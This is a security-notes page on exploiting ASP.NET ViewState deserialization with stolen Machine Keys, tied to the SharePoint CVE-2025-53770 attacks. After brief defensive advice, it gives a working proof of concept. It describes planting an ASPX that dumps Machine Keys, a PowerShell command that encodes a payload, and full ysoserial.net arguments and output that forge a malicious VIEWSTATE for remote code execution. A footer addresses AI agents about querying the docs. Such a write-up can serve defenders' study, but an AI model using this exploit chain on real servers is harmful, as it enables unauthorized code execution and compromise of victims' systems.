# ViewState - CVE-2025-53770 ## .NET ViewState About 10 days after SharePoint deserialization bugs (CVE-2025-53770/53771) were abused, attackers began dropping ASPX shells that leak IIS/ASP.NET Machine Keys used to protect VIEWSTATE and cookies. If an attacker obtains a Machine Key — from `web.config` or the registry via uploaded ASPX — they can forge valid VIEWSTATE payloads (e.g., via ysoserial.net) to achieve Remote Code Execution across the app. Windows won’t rotate autogenerated Machine Keys automatically, so you must regenerate the Machine Key after any code execution. Defenders should also monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts. Requirements: * VIEWSTATE deserialization (LosFormatter enabled) * MachineKey (validation key and optional decryption key) * Validation algorithm (e.g., HMACSHA256 / SHA1) * Application path / appDomain (used when crafting VIEWSTATE) * Delivery capability (send malicious VIEWSTATE to the app — e.g., HTTP POST; or obtain MachineKey via LFI/XXE or by uploading an ASPX to read the registry) ### POC || GTFO #### **Preface** As there are quite a few requirements needed I've created and uploaded the file `findMachineKey.aspx` to the target ASP.NET webserver. The ASPX file will read Machine Keys from registry as well as from the `web.config` file, and is used to simulate LFI and/or RCE to achieve the same thing. > NOTE: The findMachineKey.aspx is since release being flagged as an exploit and removed by Windows Threat Protection.

To deliver our, soon to be made, malicious VIEWSTATE payload we need a page that accepts POSTs so I made this simple web form echoing your name.

All files used can be found on GitHub. **Exploit** Download [ysoserial.net](https://github.com/irsdl/ysonet/releases/download/ysonet%2Fv1.11/ysonet-v1.11.zip) and create you b64 encoded payload. ```powershell PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt')) dwBo[truncated]HQA ``` Generate your malicious VIEWSTATE payload using ysoserial.net. ```powershell $ysoArgs = @( '-p','ViewState', '-g','TextFormattingRunProperties', '-c','"powershell -e dwBo[truncated]HQA"', '--path','/default.aspx', '--apppath','/', '--validationalg','HMACSHA256', '--validationkey','B298[truncated]173D', '--islegacy', '--isdebug' ) PS C:\Users\void\Downloads\ysonet-v1.11> .\ysonet.exe @ysoArgs Validation Algorithm: HMACSHA256 Validation Key: B298[truncated]173D simulateTemplateSourceDirectory returns: / simulateGetTypeName returns: default_aspx SortKey.KeyData for TemplateSourceDirectory: 7, 53, 1, 1, 1, 1, 0 SortKey.KeyData for GetTypeName: 14, 26, 14, 33, 14, 35, 14, 2, 14, 159, 14, 72, 14, 153, 7, 68, 14, 2, 14, 145, 14, 126, 14, 166, 1, 1, 1, 1, 0 Calculated pageHashCode in int: -905247948 Calculated pageHashCode in uint: 3389719348 Calculated __VIEWSTATEGENERATOR: CA0B0334 %2FwEy6[truncated]WoRI%3D ``` Send a POST request with the malicious VIEWSTATE payload to the victim and we SHOULD get an `500 Internal Server Error` response, this is good means that the exploit was successful.

Verify on the server side that the file `C:\Windows\Temp\a.txt` exists, meaning we got RCE.

*** ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/exploits-pocs/asp.net/viewstate-cve-2025-53770.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.